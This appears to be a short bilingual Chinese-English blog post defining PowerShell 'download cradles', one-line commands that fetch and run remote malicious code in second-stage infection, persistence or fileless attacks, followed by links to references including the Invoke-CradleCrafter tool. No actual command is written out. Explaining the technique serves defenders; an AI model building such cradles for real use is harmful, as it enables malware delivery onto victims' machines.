Download Cradles 是什么? (Powershell/Malware)
TL;DR
Download Cradles 是一句话的代码,主要功能是下载远程的额外的其他功能的恶意代码,并执行。
A download cradle is a single line command for download and code execution. Typically seen at the end of a maldoc or exploit, implementing the second stage download of exploit/infection within the attack lifecycle. A download cradle can also be part of a persistence mechanism, tooling or execution at other attack stages when an attacker attempts to download capability or run fileless.
参考资料
https://github.com/danielbohannon/Invoke-CradleCrafter
Powershell Download Cradles
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
What is an IEX download cradle?
https://security.stackexchange.com/questions/109905/what-is-an-iex-download-cradle
Leave a Reply